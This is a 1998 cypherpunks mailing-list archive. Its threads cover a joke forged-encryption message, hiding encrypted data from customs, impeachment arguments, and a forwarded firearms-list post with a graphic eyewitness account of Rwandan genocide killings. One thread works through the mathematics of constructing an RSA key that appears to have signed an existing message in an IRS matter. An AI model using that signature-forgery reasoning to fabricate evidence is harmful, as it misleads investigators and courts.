N3xKrtDRqLPInB8PY7Kfd56jjQsVVRKmJBwXqHbPax4YyUB6ZbKKvSPiuUsAAQSl
BAH3CFNKcmYjf+VtpjAVOpDNM/PMm1e6m33rZ01Sq6pXC0TTabCf7hkWscet0PCL
VX0l1Zw5IKaFqo+pZ3EICRMF6HQrc30G7L9TFeKr//3YsO3/bC4VBgNQHA0qf2nD
ldxAsTGPlRthBTxrzE0LjeOKi/pQOLXQMPQUwEIaL9rncjFgniplFoL6Nj0guJvW
VvS+gxth8hpeWss7WlFFioV0vShsS/lahA+eg/9nVy8ken8pr4m484w2vwoiSdce
CarVigVaRh6tCgh0jub7CHuDFg==
=Q9+G
-----END PGP MESSAGE-----

The EFF doesn't have a copy of the correct answer locked away in
a secret underground cave in Tibet, for verification, because
the above Forged Encryption message is just a bunch of crap we
typed in pretty much at random.

Does the government want to keep your private key in escrow? Give
them a copy of your EFF private key.
Hell, give them _two_ copies, in case one is corrupted.{;>) Smile
when you give them to the government agent. Ask him how his day
has been. Offer him some coffe, and ask about his family. Tell 
him you will send him a Christmas card with another copy of your
EFF private key, just in case the government misplaces the copies
you gave them.
Put your hand over your heart, salute the flag, and sing "God Bless
America" as the government agent leaves. Then fart.

Use the EFF Forged Encryption sofware regularly, to send messages
with Subject:'s like "The Plot Against the PREZ," "Confirmation of
the date of our armed assault," "The Nuke has arrived."
Keep a copy of your EFF Forged Encryption secret key in a directory
named "Off the Pigs." 
Most importantly, never reveal in your private email to others that
you are a deaf, dumb and blind quadraplegic who has been homebound
since birth. That way, the outrageous claims that government agents
make against you in their secret deposition for a warrant to kick
in your door and terrorize you will look all the more foolish during
your trial.

We at the Electronic Forgery Foundation realize that some of you wise
guys are thinking that, for $10 million, it is well worth your while
to write a program that will decipher the above message into something
meaningful. Well, knock yourself out, dudes, but if you think that
known forgers couldn't possibly be lying about the $10 million, then
go directly to http://www.clueserver/fucking_idiot, do not pass GO
and do not collect $200.

---------------------------------------------------------------------
  This message is copyrighted under the auspices of the Electronic 
  Forgery Foundation. Any misquoting, misrepresentation, or other
  abuse of this message would be greatly appreciated. Hell, you can
  tell people you wrote it, if you want to. We don't really care.
---------------------------------------------------------------------

[2] (long)keyid 0xAA33063CE6A9C799 (Toto <toto@sk.sympatico.ca>)
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 5.0
Comment: PGP Key Server 0.9.3-db2test

mQCNAzMs140AAAEEAL1CAoB5pd97hIOoT6L0v05Ov8nw0unf0db6NXZ91EJAyq9p
DoPGJl7Z6m5McIsNI2DrCEEt7KYdt0ZIGcqqK2gmCePYI0oQOFj+jznI3jKXg1k2
R+ngk+cUn21EfrNXFGPk1Tuc1/3Qib6cX6BZRJvvz1FNYNt/zqozBjzmqceZAAUR
tBtUb3RvIDx0b3RvQHNrLnN5bXBhdGljby5jYT6JAJUDBRAzgrFaG9qyus40wB0B
AeagA/47sR2GW3y/e3z63ZHqvZwsrNZabNtVsLU6QoEfomfOc0ViI+RY3w5dAjQI
62zCSj/DXaLEwYGNbqVcwjlos5STdoxFqRHpHf6hLCZSNjUaIqY19n0U0qTs6Hw4
WuRURrbMLJYVEgiZpRynmMPnwQ+1USQ1MV6MevboXeJ08lHoDYkAlQIFEDM9HqMi
iRpDQSB+5QEBHJYD/0/VRUy8EAZdjjzx/82+zUJmen9rRI3EQtd+kzInP9V13ZG5
qFFihznQJukXX9A53g9l4RbZo1P+yHF+bdD3OnEbPIWDL/+0Rd3DZp53N1Pigw6A
MGoyvNzYt83zNaoXlxYksBIirBusiSbJlHotQLGYTv1aaBGVAYAd8zDALdYtiQA/
AwUQM4KBc4I3FG4quJ9UEQLr0QCdFQDsbIKVKU6f5olwRSACnq/YtJoAnig/jD9Q
c8CVTPsw++ok1kWZeqXViQCVAwUQM4J+6pfboLn8NWjNAQGTigQAnrFZ8OiAguWq
i1LsClKo0t9y+Ly98EPnpBt2FgQN9/Z8PSZjPqEn9AJk7Z5TBhGJNXBmkULiuNA9
zvGTsRM0S7Oi6/WFUcL9rio6gMsxTnDythGaFa5YDQXgXtFxqcjsojGhe922KFnV
i4xxatO9vm9Zo3JaNAK8zvg2rIrd7VSJAJUDBRAzgn8PsF+MkGb7jGUBAYbmBACV
tqTdmo9Zu/e9hpEL1FQXnp1qzKilzchxf+9/mBmbCy6O/QKVkdUTptkYMVyUHh0q
1KJV4caZIx3vQyeRsK7Fe5vex38LzN9lcP99lOE9Y8nns1bwaiUONe1McWEtkEkG
SMi3FaIxRCb4f5ENjRV8EzydQbHD5+Pyp0+gw9LuXIkBFQMFEDOC1g34yQH5HnUh
EwEBoHAH/RDpelRJCSEtRC7upHwGbfuZL3RhlgXomiOL5plSn2i2El7hm1k1UKcG
UHvcz1ni2deWRK/qLle9xN8wXIjZMATWJLfeSoSpZoq8yFKdN+r2fkpwyN4h6hmb
SI0DBm73eiO7cIRgxszpQDnI5uhTp083JUX/dtFlBMtr/XsIBfg6PN6pYYIAZ1cn
pqkKHHFpdJe3+/AIHzw53nJUKm8EX+Bui1EOfljB63U6oP+Q1F3Wo0C1PaN/9Hbo
3IkVSLC1i3JUQwjh0moFuB+ZeLUFTxBwp+F2Y1AcvQT6JJW529WPTXOvfT2/+wU7
uVaynaHMum8snzPWMr5v0dQbq+6+OPU=
=leOK
-----END PGP PUBLIC KEY BLOCK-----

[3]

Type Bits/KeyID    Date       User ID
pub  2048/86B519BD 1998/09/10 Adam Back <aba@dcs.ex.ac.uk> (FS key, Sep 98)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzX3ILwAAAEIAL368F4iaAlWFsXFUXdgSttJaHpjcLXmqZP93FlhQRyhSco6
6wyTWEa0UQ25ynf/r/sh4Z7/xjD+HSUUCnpLDJnN9143JUO1UbDIGTq3vC+uKJjr
1OnZQMI0SOrpdUUvbz9zyC2Zsj+CACGbX+sFpecT/XxMpSeEbfoNoy5+AWjB7eIa
27qloHFGRZrDfFvewaSybck21PGVEwkTrpBQ4Yf1RGDod+Xe079jq79uZNNDgnTN
UaFXFS0BmH0nJmjWE5/QkNsgy0aPuFcR65TKn54Fj7e82g1ScEYlwS3iRBuebpAU
pH81flyI4qr9dvBatcpQXut+PxXT+mQxbIa1Gb0ABRO0LUFkYW0gQmFjayA8YWJh
QGRjcy5leC5hYy51az4gKEZTIGtleSwgU2VwIDk4KYkBFQMFEDX3IQ0+e8qoKLJF
UQEBhH4H/3u1USAlPwbGPMfMwZwBU4uCm6EPf03LKgtGa/elSn8nvrSbRrvLVdnQ
aQWJBQpLegUkDlrd0LG9guGdaEJxJ3pZteeaDuC9WeHJWBuUbiyrNooTk7QGeVM1
9yTAW9zaHW/NpXSYL45XfHYuYrKiX50gAY+CSc3rE4Ei++R0gTAwRnS9JkKqsdzP
CJThyy+ppteG5d7aw8L26AQQGUvcZKR3wTvGpGAfU6bZo1gmvnloSYelbxvUfkq2
ybHBZWXj7iBRPwTT6przBVp3DaCm8/gOzUBxvJZkoDsbf/iVBX/Qf8sVGq/86ksB
/JmE7cAVNveJ+a9wx4kTNVmjP7Aciao=
=vpQX
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 15:10:01 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives...
Message-ID: <199809192012.WAA05755@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:

> At 1:01 AM -0400 on 9/19/98, Anonymous wrote:
> > (Had this been a UK Customs 'inspection' of the contents of the disk, I
> > might have had to explain the half-gig of "noise" I have on the disk.
> > Only, it really is noise. Really.)
> 
> This makes me think of something that I probably missed in the bowels of
> someone's long previous stego posting (um, stego^stego? :-)), how would you
> go about either:
> 
> Stegoing an encrypted partition as "blank" hard drive space without
> actually writing over it unless you wanted to?
> 
> or, even,
> 
> Stegoing an encrypted partition as not even *there* at all?
> 
> 
> Doesn't seem like it would be too hard conceptually (hah!) and, if done,
> might actually defeat such Archie-look-up-the-dress as the British
> customsfolk are wont to do these days.
> 
> Obviously, even if the partition were found, it would look, to sniffer
> programs, as if it were empty, right? :-).

Once they realize people are doing this, they will begin taking hashes or
some other record of the blank space. The next time you are scanned by
customs, they pull the record and compare the previous "blank"  space with
the current "blank" space. If they don't match, you're suspect. 

They still cannot prove that you're carrying hidden data. They ask you if
you know what stego is. They ask you if you have hidden data on your
drive. If you say yes, they demand to see it. If you say no, they say
"Okay, then it should be no problem if we push the wipe button on our
program, should it?" 

If they start doing that they have still won, because now you are not
carrying the data across the border or the data is destroyed as you cross
the border.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 20 Sep 1998 08:14:45 +0800
To: Ron Rivest <rivest@theory.lcs.mit.edu>
Subject: Re: Questions for Magaziner? // taxing crypto
In-Reply-To: <199809200104.VAA13387@swan>
Message-ID: <v04011701b22a16487023@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:04 PM -0400 on 9/19/98, Ron Rivest wrote:


> I feel mis-quoted and/or mis-represented in your note (below)
> stating that "Magaziner mirrored Rivest's offer to tax encryption
> products to pay for increased law enforcement technology support".

Okay. Cool. Sorry if I mischaracterized it somehow, I wasn't trying to.

Or was it Diffie who said something like that?

By the way, someone told me that the Crypto "Authors@MIT" talk with you and
Diffie, etc., was on CSPAN recently, so if someone *really* wanted to, they
could go back, see *exactly* what was said, and say here what the idea was,
(and who to attribute it to, of course), that prompted me to make the, um,
offending, comment, they could do so.

Frankly, I was too hyped from telling the FBI guy he didn't matter anymore,
not to mention his dirty look that followed :-), to remember it accurately
enough for scientific attribution.

"The cost of error on a network full of scientists is bandwidth."
 -- Hettinga's Law of Network Noise

Sorry if I mischaracterized what was surely the right thing to say at the
time... :-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 19 Sep 1998 17:38:11 +0800
To: cypherpunks@cyberpass.net
Subject: (fwd) Re: CHALLENGE? Toto/signature attack w. unpublished public key
In-Reply-To: <199809191052.LAA19676@server.eternity.org>
Message-ID: <199809192139.WAA26471@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




[I thought I posted the post Anonymous is replying to to cypherpunks &
cryptography.  He however seems to have followed up to coderpunks.]

Here [1] is a suggestion from Anonymous which sounds technically good,
an improvement over my approach to finding additional keys capable of
signing the message, it shows that quite plausibly one could generate
another key which could have signed the message in question.

Hope Carl Johnson can get a technical expert with enough smarts to
understand the below, and express this if it is necessary.

Adam

[1] Forwarded message from coderpunks:
======================================================================
Date: Sat, 19 Sep 1998 21:48:07 +0200
From: Anonymous <nobody@replay.com>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <abuse@replay.com>.
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished public key
To: coderpunks@toad.com
Sender: owner-coderpunks@toad.com
Precedence: bulk

A very interesting problem...

Adam Back writes:

> This post discusses the possibility of generating a RSA public key n,
> and e given a signature s on a message m creating using an unknown
> (unpublished) n and e.  A message and signature whose validity has
> some bearing on a current IRS investigation is given as a target for
> an attack if such an attack is feasible.
> [...]
> So next we would like to solve:
> 
>         s ^ e mod n = m
> 
> or in other words find e, k and n st:
> 
>         s ^ e - m = k * n

In addition it has to be that n is the right length based on the "s"
padding.  This limits it to an 8 bit range, in this case 1024-1031 bits.

There are two approaches here.  First, the one you are doing: try
different e values and factor s^e - m until you find one which looks
like it could be a plausible k * n.  The problem is that n is supposed
to be the product of two large primes, and if it is, you won't be able
to factor it.  So you might be able to create a public key which looks
reasonable, but you can't create a private key which does, one which is
a multiple of two large primes.  If you make n be a product of a bunch
of small primes, so that you can make signatures with it, then a third
party can detect this and know it is bogus.

Also, this approach won't match the keyid of the original signature.

Another approach is to generate an n such that the discrete logarithm
is solvable mod n.  Then you can solve for e in s^e = m mod n, with
the base of the discrete log being s.  Doing this you can match the
keyid and size of n without too much difficulty.

Unfortunately e will not be small; it will be about the same size as n.
There are one or two keys on the public keyring which have large e's,
apparently generated by hacked versions of pgp.  Some people feel
safer with random e than a small e.  So this could perhaps be accepted.
(OTOH given two keys that both sign the same message, one with a small
e and one with a large one, it is obvious that the first is the legit
one and the second is the cloned one.)

If you know the factorization of the size of the exponentiation group mod
n, and all the factors are small enough, you can solve the discrete log
problem mod n.  You solve the discrete log separately for each factor
and then combine the results.  With an RSA modulus, the group order is
LCM(p-1,q-1), or equivalently (p-1)(q-1)/GCD(p-1,q-1).  If you were able
to solve discrete logs mod p-1 and q-1 then you could solve discrete
logs mod n.

Unfortunately with a 1024 bit RSA modulus it is not going to be
feasible to solve 512 bit discrete logs using a reasonable amount
of effort.  However by using more factors in the RSA modulus it should
become practical.  The number of factors needed will depend on how much
resources you have to work on the discrete log.

Once you have your n and e you can sign other messages with the key.
The n looks OK from outside because the fact that it has more than two
factors is not detectable, as long as its factors are not too small.
Actually there may be a way of distinguishing n's with two factors from
n's with more, check into this.

Also check into whether n's of this form can be factored via a p-1
factoring attack.  It may be that making the discrete log easy also makes
the modulus factorable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 19 Sep 1998 22:21:01 +0800
To: "Bowman  Karen" <Sporting.Shooters.Association@adelaide.on.net>
Subject: Genocide    WAS: Political purges and Bill C-68
Message-ID: <199809200301.XAA12070@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from the Canadian Firearms Digest  V2 #596, Sat Sept 19, 1998

Thank you, principal@connect.ab.ca for your enlightening commentary. Since you posted it on a public list, I took the permission to re-post it to the original list.

Highest regards.

Jean-Francois Avon

--------------------------- your letter -----------------------------
Date: Fri, 18 Sep 1998 15:52:46 -0600
From: principal@connect.ab.ca
Subject: genocide

************** Beginning of Quote **********************
Date: Thu, 17 Sep 1998 14:10:44 -0600
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Subject: Political purges and Bill C-68

Hi to all of you. I know most of you personally, except for the posts to 
mailing lists and public organisms.

- - ------------------ beginning of letter ---------------
Yesterday night, around 2am, I was unable to sleep and surfing the TV 
channels up until I fell on a movie on the ShowCase channel. This channel 
is devoted to repertoire cinema and less mainstream movies.

As I flick to this channel, I see something I can't take my eyes off for 
it's overwhelming revolting topic: a bunch of corpses are on a dolly, each 
of one being tied by the feet to a crane cable and quickly, efficiently 
taken away to a big heap of corpses.
<SNIP>
***************** End of Quote **************************

I was in Rwanda during the latter part of the genocide and during the period
immediately following the Revolution. I concur with Mr. Avon. I have seen
the heaps of corpses. The deaths of these people is tragic and firearms
owners and free men and women should know what can happen if we allow
ourselves to be cowed by government.

It is worthwhile noting that contrary to the lies spewed by anti firearms
groups firearms do not kill people. Rarely were the people of Rwanda killed
by gunfire. They were killed in the tens of thousands with clubs and
machetes. Why did these people go to there deaths like sheep to the
slaughter? In my opinion they were so accustomed to unquestioning compliance
that even in the face of death they would not rise up and fight. At the
dozens of execution sites I encountered there were only two occasions where
I saw evidence of gunfire. This was in the form of shotgun casings. I
point this out because I questioned survivors about the procedures used by
the government forces to round up and execute the mass numbers of people we
are talking about here.

Consistently, I was told that the government forces, with the assistance of
collaborators, would either threaten the village leaders or convince them
that they would be spared if they complied. They then moved the group
en-mass to a collection point. At this time the villagers still complied
with the butchers. Once a sufficient number of people were collected they
would be slaughtered. The ratio of killers to victims would be quite small
so if they had risen up as a group there could have been mass escape. This
did not happen. There were exceptions . . . this is where the shotgun
shells come in. There would be a couple of government soldiers with guns to
cut down anyone that fled. 

In the Amahoro stadium in Kigali the bodies were piled one on top of
another. Approx. 25,000 Rwandans were slaughtered there over a period of
just a few days. In a small church and grounds on the road North from
Cyangugu another 10,000 where slaughtered, hacked and bludgeoned to death. 

Of all the sensory overloads I experienced, one of the most memorable was
that of a school in a village near the Eastern town of Byumba. The men and
women were separated, which was fairly common, and then slaughtered. As
usual they were not JUST killed but were hacked to pieces. Limbs were often
chopped off first, brutal torture and emasculation was common before a
merciful death was delivered by a fatal blow or machete wound. 

One of the dead was a young woman, her skull had been crushed with a club,
upon examination of the body I saw that she still clutched her infant child
to her chest. The skull of the child too was crushed. Drunk on the
absolute power given to them by the government the soldiers and Intehamwe
collaborators became blood thirsty fiends capable of killing a baby in such
a brutal manner. (there were worse things but this has imprinted on my
brain)

In the center of the hollow square arrangement of huts were 2 twelve gauge
casings . . . someone had tried to escape!

There may be those who don't feel this information is topical or appropriate
for the Digest as it is not directly a firearm issue. I believe there are
some lessons.

1. Never have blind trust in the government when it comes to your or your
loved ones life(a la Hep C).
2. There will always be collaborators, help your neighbor but never trust
them completely.
3. Alone we are vulnerable, it is only through a unified group that you
stand a chance against oppression.
4. To find out what a man is, give him power.
5. To murder masses, the mass murder does not need a specific tool.
6. Police and soldiers should never be the only ones with guns.

(My credo, re-enforced by my experiences), As a free man I will not die on
my knees.

I submitted a quote to the list some months back. If the moderator will
indulge me I would like to submit it again.

"War is an ugly thing but not the ugliest of things; the decayed and
degraded state of moral and patriotic feelings which thinks that nothing is
worth war is much worse. A man who has nothing for which he is willing to
fight, nothing which is more important than his own personal safety, is a
miserable creature and has no chance of being free unless made and kept so
by the exertions of better men than himself." - John Stuart Mill




Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socitd'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C 







Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Sep 1998 22:25:32 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809200349.WAA12524@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From adam@rpini.com Sat Sep 19 22:43:16 1998
> Date: 20 Sep 1998 03:24:35 -0000
> From: Anonymous <nobody@remailer.ch>
> Subject: Re: Clinton's fake apologies (fwd)

> I agree it's bad. I agree it undermines the justice system a little bit.
> But, ... impeachment?

If you can't trust your elected officials to live up to their word, in other
words if they will lie under oath on something this immaterial then how do
you trust him to live up to the oath he took when he took office?

He asked, wasn't drafted, to have the peoples trust placed in him and then
he reniged.

> You're going after Al Capone
> for tax evasion.

Did Al Capone evade taxes? If so then what's your point?

 You want to get him because he's a Bad Person not because of
> the particular crime. This is ironic, because his crimes against our basic
> rights were committed while pursuing Bad People, but it is also hypocritical.

Not at all, it simply recognizes that any public official with a record of
lying under oath is not fit to hold office.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 19 Sep 1998 18:06:51 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980919231520.21440.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



On 19 Sep 1998, Anonymous wrote:

> > nobody@remailer.ch wrote:
> > > Subject: Re: Clinton's fake apologies (fwd)
> > 
> > > Presumably he should lie to protect the state.
> > 
> > Then don't take the oath:
> > 
> > To tell the truth, the whole truth, and nothing but the truth.
> > 
> ...
> 
> > > So lieing per se isn't the problem.
> > 
> > No, it's the fact that he took an oath to tell the truth and didn't.
> > 
> > > Murky water
> > > for impeachment, methinks.
> > 
> > Then you don't think very well.
> > 
> 
> What? To tell a lie is one thing, but if you preface it with "I'm telling the truth",
> then that is really really bad? I still think you're drawing a very fine line.

Well, kind of. If some public figure comes up before the nation and says
quietly "I did not have sex with Brenda the Barber," that's one thing. 

If the same public figure goes under oath and then lies, it's another. In
the first case, he's exercising freedom of speech, though there could be
some argument as to whether somebody in a public office has the right to
lie like that. In the second case, he's trying to throw a wrench in the
justice system. It wouldn't be as bad if somebody like Jim or I lied under
oath, but this guy is the chief executive of the United States. He's
basically Top Cop, and his administration doesn't hesitate to press
charges against people who commit all sorts of victimless crimes.

> I'm honoured to draw an ad hominem before revealing that I'm on AOL.
> 
> -- an anonymous aol32 user. 

Actually, the amazing thing is that you're from AOL. You're coherent, you
quote, and you know how to use a remailer. One in a million. ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 16:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: A question from Seattle
Message-ID: <199809192123.XAA11533@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 19 Sep 1998, Thompson, Christopher W NWS
<Christopher.W.Thompson@NWS02.usace.army.mil> sent to the Cypherpunks
list, a haven for the freedom loving, alot of cryptographers, and those of
non-Freeh thinking: 

> 
> hey,  I'm a 28 year old living in Seattle and I've been having quite the
> fantasy of watching and or participating in father/son activities...or big
> brother and little brother interaction.  Do you have any suggestions
> where/who I might contact in the Seattle metro area?
> 
> Thanks
> 
> 

You can start with your CO and the FBI. I'm forwarding this to them for
your convenience.

It's all part of the service.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 19 Sep 1998 17:38:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished public key
In-Reply-To: <199809191948.VAA03878@replay.com>
Message-ID: <199809192228.XAA26533@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:

> > So next we would like to solve:
> > 
> >         s ^ e mod n = m
> > 
> > or in other words find e, k and n st:
> > 
> >         s ^ e - m = k * n
> 
> In addition it has to be that n is the right length based on the "s"
> padding.  This limits it to an 8 bit range, in this case 1024-1031
> bits.

The constraint I gave was that log(n) = 1024.  Bear in mind that the
msbyte of s = 0x08, so we know that n > s, and I think we know that n
< 2^1024 also based on the s padding from the signature. So based on
this n would be in the range 1020 - 1024 bits, right?

> If you make n be a product of a bunch of small primes, so that you
> can make signatures with it, then a third party can detect this and
> know it is bogus.

He has to factor your n to determine that it is bogus though?  This
would imply that he had more compute than you do.  (Not unreasonable
threat model mind).

> Also, this approach won't match the keyid of the original signature.

Agree.  Weak counterpoint is that the keyid is not authenticated,
though if IRS have a key, they know it's keyid, and if that keyid is
the one posted (unauthenticated inside the armor 0xCE56A4072541C535),
this tips the probability of authorship towards the key they have.

This though is perhaps not incontroverible proof, if one posits that
Toto or unknown others were trying to create a complicated mess for
people to confuse themselves analysing.  

Evidence suggests that this was/is the case: there are other messages,
for example one with a signature with what is perhaps a 0xdeadbeef
attack against a key on the keyservers, with the same 32 bit keyid,
but a 64 bit key id differing by 1 bit.  Another key which almost but
not quite makes sense to PGP (a few bits twiddled).  Plus lots of
still undecrypted encrypted messages posted to the list, plus possibly
stegoed images posted (one image was posted together with a password
which was also publically posted together with instructions for
recovering using S-TOOLS4.ZIP (a stego package for windows), and lots
of other anonymously and pseudonymously posted images.)

(One of the encrypted keys which passphrases were forwarded to the
list for just today had been posted to the list over a year ago --
Carl Johnson couldn't have posted the passphrase because he is
incarcerated).

> Another approach is to generate an n such that the discrete logarithm
> is solvable mod n.  Then you can solve for e in s^e = m mod n, with
> the base of the discrete log being s.  Doing this you can match the
> keyid and size of n without too much difficulty.

Yes!  Excellent.  This construct (discrete logs over composite modulus
to allow the same operation) is used by the identity based crypto
people.  The trap door is not that good, because 512 bit discrete logs
are as you suggest rather expensive to compute.

> Unfortunately e will not be small; it will be about the same size as n.
> There are one or two keys on the public keyring which have large e's,
> apparently generated by hacked versions of pgp.  Some people feel
> safer with random e than a small e.  So this could perhaps be accepted.

It's not a hacked version of PGP, I've generated such keys myself
also: it is just a lesser documented feature of pgp2.x, (pgp -kg 1024
768) would give you a 1024 bit n and a 768 bit e).

> (OTOH given two keys that both sign the same message, one with a small
> e and one with a large one, it is obvious that the first is the legit
> one and the second is the cloned one.)

Not so obvious with the other key tinkering which has been going on
here.  It seems likely that Toto et al were purposefully trying to sow
confusion, and seem to delight in leaving little clues to people
trying to understand it looks like this strategy has been operational
for over a year now (some of the encrypted messages which passphrases
were forwarded to the list for just today had been posted to the list
over a year ago -- Carl Johnson couldn't have posted the passphrase
because he is incarcerated).

> Unfortunately with a 1024 bit RSA modulus it is not going to be
> feasible to solve 512 bit discrete logs using a reasonable amount
> of effort.  However by using more factors in the RSA modulus it should
> become practical.  The number of factors needed will depend on how much
> resources you have to work on the discrete log.

Resources available: one low end pentium based linux PC? :-) Just that
the attack is clearly feasible is interesting though a demonstration
would be perhaps more convincing to less technically aware IRS people.
The biggest resource overhead is implementing that lot though, unless
there exist packages or libraries which already do most of it for you.

> Once you have your n and e you can sign other messages with the key.
> The n looks OK from outside because the fact that it has more than two
> factors is not detectable, as long as its factors are not too small.
> Actually there may be a way of distinguishing n's with two factors from
> n's with more, check into this.
> 
> Also check into whether n's of this form can be factored via a p-1
> factoring attack.  It may be that making the discrete log easy also makes
> the modulus factorable.

I think the answer to that is yes.

In connection with previous discussions of implementing forward
secrecy using identity based crypto (search archives for cypherpunks /
coderpunks /cryptography for posts with

Subject: non-interactive forward secrecy / identity based crypto

) another Anonymous describes some of the identity based crypto papers
on this topic, which suggests another method of being able to compute
discrete logs mod composite n.

: Maurer describes an alternative set of parameters as well.  Rather than
: choosing small primes for the discrete logs, larger primes with a
: special form are used which make the problem easy.  This is based on the
: Pohlig-Hellman discrete log algorithm, which applies when p-1 has all small
: factors.  The problem is that there also exists a p-1 factoring algorithm
: which works when p-1 has all small factors.  However the former algorithm
: costs the square root of the size of the factors, while the later takes
: work proportional to the size of the factors themselves.  This gives a
: window where the discrete log can be done but the factoring will fail.
: 
: For this embodiment, Maurer suggests a modulus which is the product of
: two primes, each 100 digits (333 bits) in length.  This will produce
: a 666 bit modulus.  Have each of the primes be such that (p-1)/2 is a
: product of several 13-15 digit (43-50 bit) primes.

So it could be done, I think, and in such a way that you have lower
cpu overhead than the attacker trying to prove one key more likely
than the other.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 19 Sep 1998 22:52:03 +0800
To: "Jim Choate" <cypherpunks@cyberpass.net>
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809200353.XAA17661@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/19/98 11:24 PM, Anonymous (nobody@remailer.ch)  passed this wisdom:

>
>In reply to my suggestion that lieing under oath isn't
>a very good reason for impeachment,  
>
>Jim Choate <ravage@einstein.ssz.com> wrote:
>> Of course it's different if you preface your lie with "I swear to tell the
>> truth, the whole truth, and nothing but the truth".
>> 
>> The oath is voluntary and therefore if broken no claim for duress, only
>> intentional misdirection, can explain such actions.
>
>echoed by nobody@remailer.ch who wrote:
>> ...If some public figure ... goes under oath and then lies, ...
>> he's trying to throw a wrench in the
>> justice system. It wouldn't be as bad if somebody like Jim or I lied under
>> oath, but this guy is the chief executive of the United States. He's
>> basically Top Cop, and his administration doesn't hesitate to press
>> charges against people who commit all sorts of victimless crimes.
>> 
>
>I agree it's bad. I agree it undermines the justice system a little bit.
>But, ... impeachment?
>
>You're not charging him with murder (eg WACO), attacking the 1st 
>ammendment (CDA),
>the 4th (SSN on driver's licences), the 5th (GAK). You're going after Al 
>Capone
>for tax evasion. You want to get him because he's a Bad Person not because of
>the particular crime. This is ironic, because his crimes against our basic
>rights were committed while pursuing Bad People, but it is also hypocritical.
>

They couldn't get Capone any other way but on Income Tax Evasion ... we 
all know how much more guilty of how many more heinous crimes he was ... 
but we took him the only way we could ... Clinton is no different ... it 
would be grand and so fitting if we could impeach himt for having 
committed aggravated assault upon the Bill of Rights, but if we have to 
get him because he can't keep his pecker zipped up then so be it ... as 
with case of Al Capone, this country will also be richer without William 
Jefferson (Thomas must be rolling in his grave!) Klinton!




Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "When hell freezes over, grab your ice skates."
      -- Mark Johnson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 17:20:56 +0800
To: cypherpunks@toad.com
Subject: IDEA(tm) weakness?
Message-ID: <199809192204.AAA15005@replay.com>
MIME-Version: 1.0
